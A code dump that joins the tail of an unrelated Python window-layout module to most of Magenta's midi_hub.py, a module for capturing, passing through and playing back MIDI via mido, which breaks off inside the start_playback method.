ws_state = ws_state.replacing_view_state(view, i=s.i+di, j=s.j+dj).focusing_view(view)
ws_state.validate_stack_indices(view)
return (None, state.setting_workspace_state(ws, ws_state))
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
def resize_focused_view(self, di: int, dj: int) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s = state.get_view_state(view)
i, j, w, h = s.i, s.j, s.w, s.h
w += di
h += dj
if w == 0:
w = 2
i -= 1
if h == 0:
h = 2
j -= 1
s, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
ws_state = ws_state.replacing_view_state(view, i=i, j=j, w=w, h=h).focusing_view(view)
state.validate_stack_indices(view)
return (None, state.setting_workspace_state(ws, ws_state))
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
"""
6. Legacy
"""
def close_view(self) -> None:
self.close_focused_view()
|
midi_hub.py
|
# Copyright 2022 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for interfacing with the MIDI environment."""
# TODO(adarob): Use flattened imports.
import abc
import collections
import queue
import re
import threading
import time
from magenta.common import concurrency
import mido
from note_seq.protobuf import music_pb2
import tensorflow.compat.v1 as tf
_DEFAULT_METRONOME_TICK_DURATION = 0.05
_DEFAULT_METRONOME_PROGRAM = 117 # Melodic Tom
_DEFAULT_METRONOME_MESSAGES = [
mido.Message(type='note_on', note=44, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
]
_DEFAULT_METRONOME_CHANNEL = 1
# 0-indexed.
_DRUM_CHANNEL = 9
try:
# The RtMidi backend is easier to install and has support for virtual ports.
import rtmidi # pylint: disable=unused-import,g-import-not-at-top
mido.set_backend('mido.backends.rtmidi')
except ImportError:
# Tries to use PortMidi backend by default.
tf.logging.warn('Could not import RtMidi. Virtual ports are disabled.')
class MidiHubError(Exception): # pylint:disable=g-bad-exception-name
"""Base class for exceptions in this module."""
pass
def get_available_input_ports():
"""Returns a list of available input MIDI ports."""
return mido.get_input_names()
def get_available_output_ports():
"""Returns a list of available output MIDI ports."""
return mido.get_output_names()
class MidiSignal(object):
"""A class for representing a MIDI-based event signal.
Provides a `__str__` method to return a regular expression pattern for
matching against the string representation of a mido.Message with wildcards
for unspecified values.
Supports matching for message types 'note_on', 'note_off', and
'control_change'. If a mido.Message is given as the `msg` argument, matches
against the exact message, ignoring the time attribute. If a `msg` is
not given, keyword arguments must be provided matching some non-empty subset
of those listed as a value for at least one key in `_VALID_ARGS`.
Examples:
# A signal that matches any 'note_on' message.
note_on_signal = MidiSignal(type='note_on')
# A signal that matches any 'note_on' or 'note_off' message with a pitch
# value of 4 and a velocity of 127.
note_signal = MidiSignal(note=4, velocity=127)
# A signal that matches a specific mido.Message exactly (ignoring time).
msg = mido.Message(type='control_signal', control=1, value=127)
control_1_127_signal = MidiSignal(msg=msg)
Args:
msg: A mido.Message that should be matched exactly (excluding the time
attribute) or None if wildcards are to be used.
**kwargs: Valid mido.Message arguments. Those that are not provided will be
treated as wildcards.
Raises:
MidiHubError: If the message type is unsupported or the arguments are
not in the valid set for the given or inferred type.
"""
_NOTE_ARGS = set(['type', 'note', 'program_number', 'velocity'])
_CONTROL_ARGS = set(['type', 'control', 'value'])
_VALID_ARGS = {
'note_on': _NOTE_ARGS,
'note_off': _NOTE_ARGS,
'control_change': _CONTROL_ARGS,
}
def __init__(self, msg=None, **kwargs):
if msg is not None and kwargs:
raise MidiHubError(
'Either a mido.Message should be provided or arguments. Not both.')
type_ = msg.type if msg is not None else kwargs.get('type')
if 'type' in kwargs:
del kwargs['type']
if type_ is not None and type_ not in self._VALID_ARGS:
raise MidiHubError(
"The type of a MidiSignal must be either 'note_on', 'note_off', "
"'control_change' or None for wildcard matching. Got '%s'." % type_)
# The compatible mido.Message types.
inferred_types = [type_] if type_ is not None else []
# If msg is not provided, check that the given arguments are valid for some
# message type.
if msg is None:
if type_ is not None:
for arg_name in kwargs:
if arg_name not in self._VALID_ARGS[type_]:
raise MidiHubError(
"Invalid argument for type '%s': %s" % (type_, arg_name))
else:
if kwargs:
for name, args in self._VALID_ARGS.items():
if set(kwargs) <= args:
inferred_types.append(name)
if not inferred_types:
raise MidiHubError(
'Could not infer a message type for set of given arguments: %s'
% ', '.join(kwargs))
# If there is only a single valid inferred type, use it.
if len(inferred_types) == 1:
type_ = inferred_types[0]
self._msg = msg
self._kwargs = kwargs
self._type = type_
self._inferred_types = inferred_types
def to_message(self):
"""Returns a message using the signal's specifications, if possible."""
if self._msg:
return self._msg
if not self._type:
raise MidiHubError('Cannot build message if type is not inferrable.')
return mido.Message(self._type, **self._kwargs)
def __str__(self):
"""Returns a regex pattern for matching against a mido.Message string."""
if self._msg is not None:
regex_pattern = '^' + mido.messages.format_as_string(
self._msg, include_time=False) + r' time=\d+.\d+$'
else:
# Generate regex pattern.
parts = ['.*' if self._type is None else self._type]
for name in mido.messages.SPEC_BY_TYPE[self._inferred_types[0]][
'value_names']:
if name in self._kwargs:
parts.append('%s=%d' % (name, self._kwargs[name]))
else:
parts.append(r'%s=\d+' % name)
regex_pattern = '^' + ' '.join(parts) + r' time=\d+.\d+$'
return regex_pattern
class Metronome(threading.Thread):
"""A thread implementing a MIDI metronome.
Args:
outport: The Mido port for sending messages.
qpm: The integer quarters per minute to signal on.
start_time: The float wall time in seconds to treat as the first beat
for alignment. If in the future, the first tick will not start until
after this time.
stop_time: The float wall time in seconds after which the metronome should
stop, or None if it should continue until `stop` is called.
program: The MIDI program number to use for metronome ticks.
signals: An ordered collection of MidiSignals whose underlying messages are
to be output on the metronome's tick, cyclically. A None value can be
used in place of a MidiSignal to output nothing on a given tick.
duration: The duration of the metronome's tick.
channel: The MIDI channel to output on.
"""
daemon = True
def __init__(self,
outport,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
self._outport = outport
self.update(
qpm, start_time, stop_time, program, signals, duration, channel)
super(Metronome, self).__init__()
def update(self,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
"""Updates Metronome options."""
# Locking is not required since variables are independent and assignment is
# atomic.
self._channel = _DEFAULT_METRONOME_CHANNEL if channel is None else channel
# Set the program number for the channels.
self._outport.send(
mido.Message(
type='program_change', program=program, channel=self._channel))
self._period = 60. / qpm
self._start_time = start_time
self._stop_time = stop_time
if signals is None:
self._messages = _DEFAULT_METRONOME_MESSAGES
else:
self._messages = [s.to_message() if s else None for s in signals]
self._duration = duration
def run(self):
"""Sends message on the qpm interval until stop signal received."""
sleeper = concurrency.Sleeper()
while True:
now = time.time()
tick_number = max(0, int((now - self._start_time) // self._period) + 1)
tick_time = tick_number * self._period + self._start_time
if self._stop_time is not None and self._stop_time < tick_time:
break
sleeper.sleep_until(tick_time)
metric_position = tick_number % len(self._messages)
tick_message = self._messages[metric_position]
if tick_message is None:
continue
tick_message.channel = self._channel
self._outport.send(tick_message)
if tick_message.type == 'note_on':
sleeper.sleep(self._duration)
end_tick_message = mido.Message(
'note_off', note=tick_message.note, channel=self._channel)
self._outport.send(end_tick_message)
def stop(self, stop_time=0, block=True):
"""Signals for the metronome to stop.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until thread terminates.
"""
self._stop_time = stop_time
if block:
self.join()
class MidiPlayer(threading.Thread):
"""A thread for playing back a NoteSequence proto via MIDI.
The NoteSequence times must be based on the wall time. The playhead matches
the wall clock. The playback sequence may be updated at any time if
`allow_updates` is set to True.
Args:
outport: The Mido port for sending messages.
sequence: The NoteSequence to play.
start_time: The float time before which to strip events. Defaults to
construction time. Events before this time will be sent immediately on
start.
allow_updates: If False, the thread will terminate after playback of
`sequence` completes and calling `update_sequence` will result in an
exception. Otherwise, the the thread will stay alive until `stop` is
called, allowing for additional updates via `update_sequence`.
channel: The MIDI channel to send playback events.
offset: The float time in seconds to adjust the playback event times by.
"""
def __init__(self, outport, sequence, start_time=time.time(),
allow_updates=False, channel=0, offset=0.0):
self._outport = outport
self._channel = channel
self._offset = offset
# Set of notes (pitches) that are currently on.
self._open_notes = set()
# Lock for serialization.
self._lock = threading.RLock()
# A control variable to signal when the sequence has been updated.
self._update_cv = threading.Condition(self._lock)
# The queue of mido.Message objects to send, sorted by ascending time.
self._message_queue = collections.deque()
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Initialize message queue.
# We first have to allow "updates" to set the initial sequence.
self._allow_updates = True
self.update_sequence(sequence, start_time=start_time)
# We now make whether we allow updates dependent on the argument.
self._allow_updates = allow_updates
super(MidiPlayer, self).__init__()
@concurrency.serialized
def update_sequence(self, sequence, start_time=None):
"""Updates sequence being played by the MidiPlayer.
Adds events to close any notes that are no longer being closed by the
new sequence using the times when they would have been closed by the
previous sequence.
Args:
sequence: The NoteSequence to play back.
start_time: The float time before which to strip events. Defaults to call
time.
Raises:
MidiHubError: If called when _allow_updates is False.
"""
if start_time is None:
start_time = time.time()
if not self._allow_updates:
raise MidiHubError(
'Attempted to update a MidiPlayer sequence with updates disabled.')
new_message_list = []
# The set of pitches that are already playing and will be closed without
# first being reopened in in the new sequence.
closed_notes = set()
for note in sequence.notes:
if note.start_time >= start_time:
new_message_list.append(
mido.Message(type='note_on', note=note.pitch,
velocity=note.velocity, time=note.start_time))
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
elif note.end_time >= start_time and note.pitch in self._open_notes:
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
closed_notes.add(note.pitch)
# Close remaining open notes at the next event time to avoid abruptly ending
# notes.
notes_to_close = self._open_notes - closed_notes
if notes_to_close:
next_event_time = (
min(msg.time for msg in new_message_list) if new_message_list else 0)
for note in notes_to_close:
new_message_list.append(
mido.Message(type='note_off', note=note, time=next_event_time))
for msg in new_message_list:
msg.channel = self._channel
msg.time += self._offset
self._message_queue = collections.deque(
sorted(new_message_list, key=lambda msg: (msg.time, msg.note)))
self._update_cv.notify()
@concurrency.serialized
def run(self):
"""Plays messages in the queue until empty and _allow_updates is False."""
# Assumes model where NoteSequence is time-stamped with wall time.
# TODO(hanzorama): Argument to allow initial start not at sequence start?
while self._message_queue and self._message_queue[0].time < time.time():
self._message_queue.popleft()
while True:
while self._message_queue:
delta = self._message_queue[0].time - time.time()
if delta > 0:
self._update_cv.wait(timeout=delta)
else:
msg = self._message_queue.popleft()
if msg.type == 'note_on':
self._open_notes.add(msg.note)
elif msg.type == 'note_off':
self._open_notes.discard(msg.note)
self._outport.send(msg)
# Either keep player alive and wait for sequence update, or return.
if self._allow_updates:
self._update_cv.wait()
else:
break
def stop(self, block=True):
"""Signals for the playback to stop and ends all open notes.
Args:
block: If true, blocks until thread terminates.
"""
with self._lock:
if not self._stop_signal.is_set():
self._stop_signal.set()
self._allow_updates = False
# Replace message queue with immediate end of open notes.
self._message_queue.clear()
for note in self._open_notes:
self._message_queue.append(
mido.Message(type='note_off', note=note, time=time.time()))
self._update_cv.notify()
if block:
self.join()
class MidiCaptor(threading.Thread):
"""Base class for thread that captures MIDI into a NoteSequence proto.
If neither `stop_time` nor `stop_signal` are provided as arguments, the
capture will continue until the `stop` method is called.
Args:
qpm: The quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds when the capture begins. Events
occuring before this time are ignored.
stop_time: The float wall time in seconds when the capture is to be stopped
or None.
stop_signal: A MidiSignal to use as a signal to stop capture.
"""
_metaclass__ = abc.ABCMeta
# A message that is used to wake the consumer thread.
_WAKE_MESSAGE = None
def __init__(self, qpm, start_time=0, stop_time=None, stop_signal=None):
# A lock for synchronization.
self._lock = threading.RLock()
self._receive_queue = queue.Queue()
self._captured_sequence = music_pb2.NoteSequence()
self._captured_sequence.tempos.add(qpm=qpm)
self._start_time = start_time
self._stop_time = stop_time
self._stop_regex = re.compile(str(stop_signal))
# A set of active MidiSignals being used by iterators.
self._iter_signals = []
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Active callback threads keyed by unique thread name.
self._callbacks = {}
super(MidiCaptor, self).__init__()
@property
@concurrency.serialized
def start_time(self):
return self._start_time
@start_time.setter
@concurrency.serialized
def start_time(self, value):
"""Updates the start time, removing any notes that started before it."""
self._start_time = value
i = 0
for note in self._captured_sequence.notes:
if note.start_time >= self._start_time:
break
i += 1
del self._captured_sequence.notes[:i]
@property
@concurrency.serialized
def _stop_time(self):
return self._stop_time_unsafe
@_stop_time.setter
@concurrency.serialized
def _stop_time(self, value):
self._stop_time_unsafe = value
def receive(self, msg):
"""Adds received mido.Message to the queue for capture.
Args:
msg: The incoming mido.Message object to add to the queue for capture. The
time attribute is assumed to be pre-set with the wall time when the
message was received.
Raises:
MidiHubError: When the received message has an empty time attribute.
"""
if not msg.time:
raise MidiHubError(
'MidiCaptor received message with empty time attribute: %s' % msg)
self._receive_queue.put(msg)
@abc.abstractmethod
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Must be serialized in children.
Args:
msg: The incoming mido.Message object to capture. The time field is
assumed to be pre-filled with the wall time when the message was
received.
"""
pass
def _add_note(self, msg):
"""Adds and returns a new open note based on the MIDI message."""
new_note = self._captured_sequence.notes.add()
new_note.start_time = msg.time
new_note.pitch = msg.note
new_note.velocity = msg.velocity
new_note.is_drum = (msg.channel == _DRUM_CHANNEL)
return new_note
def run(self):
"""Captures incoming messages until stop time or signal received."""
while True:
timeout = None
stop_time = self._stop_time
if stop_time is not None:
timeout = stop_time - time.time()
if timeout <= 0:
break
try:
msg = self._receive_queue.get(block=True, timeout=timeout)
except queue.Empty:
continue
if msg is MidiCaptor._WAKE_MESSAGE:
continue
if msg.time <= self._start_time:
continue
if self._stop_regex.match(str(msg)) is not None:
break
with self._lock:
msg_str = str(msg)
for regex, queue_ in self._iter_signals:
if regex.match(msg_str) is not None:
queue_.put(msg.copy())
self._capture_message(msg)
stop_time = self._stop_time
end_time = stop_time if stop_time is not None else msg.time
# Acquire lock to avoid race condition with `iterate`.
with self._lock:
# Set final captured sequence.
self._captured_sequence = self.captured_sequence(end_time)
# Wake up all generators.
for regex, queue_ in self._iter_signals:
queue_.put(MidiCaptor._WAKE_MESSAGE)
def stop(self, stop_time=None, block=True):
"""Ends capture and truncates the captured sequence at `stop_time`.
Args:
stop_time: The float time in seconds to stop the capture, or None if it
should be stopped now. May be in the past, in which case the captured
sequence will be truncated appropriately.
block: If True, blocks until the thread terminates.
Raises:
MidiHubError: When called multiple times with a `stop_time`.
"""
with self._lock:
if self._stop_signal.is_set():
if stop_time is not None:
raise MidiHubError(
'`stop` must not be called multiple times with a `stop_time` on '
'MidiCaptor.')
else:
self._stop_signal.set()
self._stop_time = time.time() if stop_time is None else stop_time
# Force the thread to wake since we've updated the stop time.
self._receive_queue.put(MidiCaptor._WAKE_MESSAGE)
if block:
self.join()
def captured_sequence(self, end_time=None):
"""Returns a copy of the current captured sequence.
If called before the thread terminates, `end_time` is required and any open
notes will have their end time set to it, any notes starting after it will
be removed, and any notes ending after it will be truncated. `total_time`
will also be set to `end_time`.
Args:
end_time: The float time in seconds to close any open notes and after
which to close or truncate notes, if the thread is still alive.
Otherwise, must be None.
Returns:
A copy of the current captured NoteSequence proto with open notes closed
at and later notes removed or truncated to `end_time`.
Raises:
MidiHubError: When the thread is alive and `end_time` is None or the
thread is terminated and `end_time` is not None.
"""
# Make a copy of the sequence currently being captured.
current_captured_sequence = music_pb2.NoteSequence()
with self._lock:
current_captured_sequence.CopyFrom(self._captured_sequence)
if self.is_alive():
if end_time is None:
raise MidiHubError(
'`end_time` must be provided when capture thread is still running.')
for i, note in enumerate(current_captured_sequence.notes):
if note.start_time >= end_time:
del current_captured_sequence.notes[i:]
break
if not note.end_time or note.end_time > end_time:
note.end_time = end_time
current_captured_sequence.total_time = end_time
elif end_time is not None:
raise MidiHubError(
'`end_time` must not be provided when capture is complete.')
return current_captured_sequence
def iterate(self, signal=None, period=None):
"""Yields the captured sequence at every signal message or time period.
Exactly one of `signal` or `period` must be specified. Continues until the
captor terminates, at which point the final captured sequence is yielded
before returning.
If consecutive calls to iterate are longer than the period, immediately
yields and logs a warning.
Args:
signal: A MidiSignal to use as a signal to yield, or None.
period: A float period in seconds, or None.
Yields:
The captured NoteSequence at event time.
Raises:
MidiHubError: If neither `signal` nor `period` or both are specified.
"""
if (signal, period).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `period` must be provided to `iterate` '
'call.')
if signal is None:
sleeper = concurrency.Sleeper()
next_yield_time = time.time() + period
else:
regex = re.compile(str(signal))
capture_queue = queue.Queue()
with self._lock:
self._iter_signals.append((regex, capture_queue))
while self.is_alive():
if signal is None:
skipped_periods = (time.time() - next_yield_time) // period
if skipped_periods > 0:
tf.logging.warn(
'Skipping %d %.3fs period(s) to catch up on iteration.',
skipped_periods, period)
next_yield_time += skipped_periods * period
else:
sleeper.sleep_until(next_yield_time)
end_time = next_yield_time
next_yield_time += period
else:
signal_msg = capture_queue.get()
if signal_msg is MidiCaptor._WAKE_MESSAGE:
# This is only recieved when the thread is in the process of
# terminating. Wait until it is done before yielding the final
# sequence.
self.join()
break
end_time = signal_msg.time
# Acquire lock so that `captured_sequence` will be called before thread
# terminates, if it has not already done so.
with self._lock:
if not self.is_alive():
break
captured_sequence = self.captured_sequence(end_time)
yield captured_sequence
yield self.captured_sequence()
def register_callback(self, fn, signal=None, period=None):
"""Calls `fn` at every signal message or time period.
The callback function must take exactly one argument, which will be the
current captured NoteSequence.
Exactly one of `signal` or `period` must be specified. Continues until the
captor thread terminates, at which point the callback is called with the
final sequence, or `cancel_callback` is called.
If callback execution is longer than a period, immediately calls upon
completion and logs a warning.
Args:
fn: The callback function to call, passing in the captured sequence.
signal: A MidiSignal to use as a signal to call `fn` on the current
captured sequence, or None.
period: A float period in seconds to specify how often to call `fn`, or
None.
Returns:
The unqiue name of the callback thread to enable cancellation.
Raises:
MidiHubError: If neither `signal` nor `period` or both are specified.
"""
class IteratorCallback(threading.Thread):
"""A thread for executing a callback on each iteration."""
def __init__(self, iterator, fn):
self._iterator = iterator
self._fn = fn
self._stop_signal = threading.Event()
super(IteratorCallback, self).__init__()
def run(self):
"""Calls the callback function for each iterator value."""
for captured_sequence in self._iterator:
if self._stop_signal.is_set():
break
self._fn(captured_sequence)
def stop(self):
"""Stops the thread on next iteration, without blocking."""
self._stop_signal.set()
t = IteratorCallback(self.iterate(signal, period), fn)
t.start()
with self._lock:
assert t.name not in self._callbacks
self._callbacks[t.name] = t
return t.name
@concurrency.serialized
def cancel_callback(self, name):
"""Cancels the callback with the given name.
While the thread may continue to run until the next iteration, the callback
function will not be executed.
Args:
name: The unique name of the callback thread to cancel.
"""
self._callbacks[name].stop()
del self._callbacks[name]
class MonophonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for monophonic melodies."""
def __init__(self, *args, **kwargs):
self._open_note = None
super(MonophonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
If the message is a note_on event, ends the previous note (if applicable)
and opens a new note in the capture sequence. Ignores repeated note_on
events.
If the message is a note_off event matching the current open note in the
capture sequence
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if self._open_note is None or msg.note != self._open_note.pitch:
# This is not the note we're looking for. Drop it.
return
self._open_note.end_time = msg.time
self._open_note = None
elif msg.type == 'note_on':
if self._open_note:
if self._open_note.pitch == msg.note:
# This is just a repeat of the previous message.
return
# End the previous note.
self._open_note.end_time = msg.time
self._open_note = self._add_note(msg)
class PolyphonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for polyphonic melodies."""
def __init__(self, *args, **kwargs):
# A dictionary of open NoteSequence.Note messages keyed by pitch.
self._open_notes = dict()
super(PolyphonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if msg.note not in self._open_notes:
# This is not a note we're looking for. Drop it.
return
self._open_notes[msg.note].end_time = msg.time
del self._open_notes[msg.note]
elif msg.type == 'note_on':
if msg.note in self._open_notes:
# This is likely just a repeat of the previous message.
return
new_note = self._add_note(msg)
self._open_notes[new_note.pitch] = new_note
class TextureType(object):
"""An Enum specifying the type of musical texture."""
MONOPHONIC = 1
POLYPHONIC = 2
class MidiHub(object):
"""A MIDI interface for capturing and playing NoteSequences.
Ignores/filters `program_change` messages. Assumes all messages are on the
same channel.
Args:
input_midi_port: The string MIDI port name or mido.ports.BaseInput object to
use for input. If a name is given that is not an available port, a
virtual port will be opened with that name.
output_midi_port: The string MIDI port name mido.ports.BaseOutput object to
use for output. If a name is given that is not an available port, a
virtual port will be opened with that name.
texture_type: A TextureType Enum specifying the musical texture to assume
during capture, passthrough, and playback.
passthrough: A boolean specifying whether or not to pass incoming messages
through to the output, applying the appropriate texture rules.
playback_channel: The MIDI channel to send playback events.
playback_offset: The float time in seconds to adjust the playback event
times by.
"""
def __init__(self, input_midi_ports, output_midi_ports, texture_type,
passthrough=True, playback_channel=0, playback_offset=0.0):
self._texture_type = texture_type
self._passthrough = passthrough
self._playback_channel = playback_channel
self._playback_offset = playback_offset
# When `passthrough` is True, this is the set of open MIDI note pitches.
self._open_notes = set()
# This lock is used by the serialized decorator.
self._lock = threading.RLock()
# A dictionary mapping a compiled MidiSignal regex to a condition variable
# that will be notified when a matching messsage is received.
self._signals = {}
# A dictionary mapping a compiled MidiSignal regex to a list of functions
# that will be called with the triggering message in individual threads when
# a matching message is received.
self._callbacks = collections.defaultdict(list)
# A dictionary mapping integer control numbers to most recently-received
# integer value.
self._control_values = {}
# Threads actively being used to capture incoming messages.
self._captors = []
# Potentially active player threads.
self._players = []
self._metronome = None
# Open MIDI ports.
inports = []
if input_midi_ports:
for port in input_midi_ports:
if isinstance(port, mido.ports.BaseInput):
inport = port
else:
virtual = port not in get_available_input_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for input.", port)
inport = mido.open_input(port, virtual=virtual)
# Start processing incoming messages.
inport.callback = self._timestamp_and_handle_message
inports.append(inport)
# Keep references to input ports to prevent deletion.
self._inports = inports
else:
tf.logging.warn('No input port specified. Capture disabled.')
self._inports = None
outports = []
for port in output_midi_ports:
if isinstance(port, mido.ports.BaseOutput):
outports.append(port)
else:
virtual = port not in get_available_output_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for output.", port)
outports.append(mido.open_output(port, virtual=virtual))
self._outport = mido.ports.MultiPort(outports)
def __del__(self):
"""Stops all running threads and waits for them to terminate."""
for captor in self._captors:
captor.stop(block=False)
for player in self._players:
player.stop(block=False)
self.stop_metronome()
for captor in self._captors:
captor.join()
for player in self._players:
player.join()
@property
@concurrency.serialized
def passthrough(self):
return self._passthrough
@passthrough.setter
@concurrency.serialized
def passthrough(self, value):
"""Sets passthrough value, closing all open notes if being disabled."""
if self._passthrough == value:
return
# Close all open notes.
while self._open_notes:
self._outport.send(mido.Message('note_off', note=self._open_notes.pop()))
self._passthrough = value
def _timestamp_and_handle_message(self, msg):
"""Stamps message with current time and passes it to the handler."""
if msg.type == 'program_change':
return
if not msg.time:
msg.time = time.time()
self._handle_message(msg)
@concurrency.serialized
def _handle_message(self, msg):
"""Handles a single incoming MIDI message.
-If the message is being used as a signal, notifies threads waiting on the
appropriate condition variable.
-Adds the message to any capture queues.
-Passes the message through to the output port, if appropriate.
Args:
msg: The mido.Message MIDI message to handle.
"""
# Notify any threads waiting for this message.
msg_str = str(msg)
for regex in list(self._signals):
if regex.match(msg_str) is not None:
self._signals[regex].notify_all()
del self._signals[regex]
# Call any callbacks waiting for this message.
for regex in list(self._callbacks):
if regex.match(msg_str) is not None:
for fn in self._callbacks[regex]:
threading.Thread(target=fn, args=(msg,)).start()
del self._callbacks[regex]
# Remove any captors that are no longer alive.
self._captors[:] = [t for t in self._captors if t.is_alive()]
# Add a different copy of the message to the receive queue of each live
# capture thread.
for t in self._captors:
t.receive(msg.copy())
# Update control values if this is a control change message.
if msg.type == 'control_change':
if self._control_values.get(msg.control, None) != msg.value:
tf.logging.debug('Control change %d: %d', msg.control, msg.value)
self._control_values[msg.control] = msg.value
# Pass the message through to the output port, if appropriate.
if not self._passthrough:
pass
elif self._texture_type == TextureType.POLYPHONIC:
if msg.type == 'note_on' and msg.velocity > 0:
self._open_notes.add(msg.note)
elif (msg.type == 'note_off' or
(msg.type == 'note_on' and msg.velocity == 0)):
self._open_notes.discard(msg.note)
self._outport.send(msg)
elif self._texture_type == TextureType.MONOPHONIC:
assert len(self._open_notes) <= 1
if msg.type not in ['note_on', 'note_off']:
self._outport.send(msg)
elif ((msg.type == 'note_off' or
msg.type == 'note_on' and msg.velocity == 0) and
msg.note in self._open_notes):
self._outport.send(msg)
self._open_notes.remove(msg.note)
elif msg.type == 'note_on' and msg.velocity > 0:
if self._open_notes:
self._outport.send(
mido.Message('note_off', note=self._open_notes.pop()))
self._outport.send(msg)
self._open_notes.add(msg.note)
def start_capture(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Starts a MidiCaptor to compile incoming messages into a NoteSequence.
If neither `stop_time` nor `stop_signal`, are provided, the caller must
explicitly stop the returned capture thread. If both are specified, the one
that occurs first will stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The MidiCaptor thread.
"""
if self._texture_type == TextureType.MONOPHONIC:
captor_class = MonophonicMidiCaptor
else:
captor_class = PolyphonicMidiCaptor
captor = captor_class(qpm, start_time, stop_time, stop_signal)
with self._lock:
self._captors.append(captor)
captor.start()
return captor
def capture_sequence(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Compiles and returns incoming messages into a NoteSequence.
Blocks until capture stops. At least one of `stop_time` or `stop_signal`
must be specified. If both are specified, the one that occurs first will
stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The captured NoteSequence proto.
Raises:
MidiHubError: When neither `stop_time` nor `stop_signal` are provided.
"""
if stop_time is None and stop_signal is None:
raise MidiHubError(
'At least one of `stop_time` and `stop_signal` must be provided to '
'`capture_sequence` call.')
captor = self.start_capture(qpm, start_time, stop_time, stop_signal)
captor.join()
return captor.captured_sequence()
@concurrency.serialized
def wait_for_event(self, signal=None, timeout=None):
"""Blocks until a matching mido.Message arrives or the timeout occurs.
Exactly one of `signal` or `timeout` must be specified. Using a timeout
with a threading.Condition object causes additional delays when notified.
Args:
signal: A MidiSignal to use as a signal to stop waiting, or None.
timeout: A float timeout in seconds, or None.
Raises:
MidiHubError: If neither `signal` nor `timeout` or both are specified.
"""
if (signal, timeout).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `timeout` must be provided to '
'`wait_for_event` call.')
if signal is None:
concurrency.Sleeper().sleep(timeout)
return
signal_pattern = str(signal)
cond_var = None
for regex, cond_var in self._signals:
if regex.pattern == signal_pattern:
break
if cond_var is None:
cond_var = threading.Condition(self._lock)
self._signals[re.compile(signal_pattern)] = cond_var
cond_var.wait()
@concurrency.serialized
def wake_signal_waiters(self, signal=None):
"""Wakes all threads waiting on a signal event.
Args:
signal: The MidiSignal to wake threads waiting on, or None to wake all.
"""
for regex in list(self._signals):
if signal is None or regex.pattern == str(signal):
self._signals[regex].notify_all()
del self._signals[regex]
for captor in self._captors:
captor.wake_signal_waiters(signal)
@concurrency.serialized
def start_metronome(self, qpm, start_time, signals=None, channel=None):
"""Starts or updates the metronome with the given arguments.
Args:
qpm: The quarter notes per minute to use.
start_time: The wall time in seconds that the metronome is started on for
synchronization and beat alignment. May be in the past.
signals: An ordered collection of MidiSignals whose underlying messages
are to be output on the metronome's tick, cyclically. A None value can
be used in place of a MidiSignal to output nothing on a given tick.
channel: The MIDI channel to output ticks on.
"""
if self._metronome is not None and self._metronome.is_alive():
self._metronome.update(
qpm, start_time, signals=signals, channel=channel)
else:
self._metronome = Metronome(
self._outport, qpm, start_time, signals=signals, channel=channel)
self._metronome.start()
@concurrency.serialized
def stop_metronome(self, stop_time=0, block=True):
"""Stops the metronome at the given time if it is currently running.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until metronome is stopped.
"""
if self._metronome is None:
return
self._metronome.stop(stop_time, block)
self._metronome = None
def start_playback(self, sequence, start_time=time.time(),
allow_updates=False):
"""Plays the notes in aNoteSequence via the MIDI output port.
Args:
sequence: The NoteSequence to play, with times based on the wall clock.
start_time: The float time before which to strip events. Defaults to call
time. Events before this time will be sent immediately on start.
allow_updates: A boolean specifying whether or not the player should stay
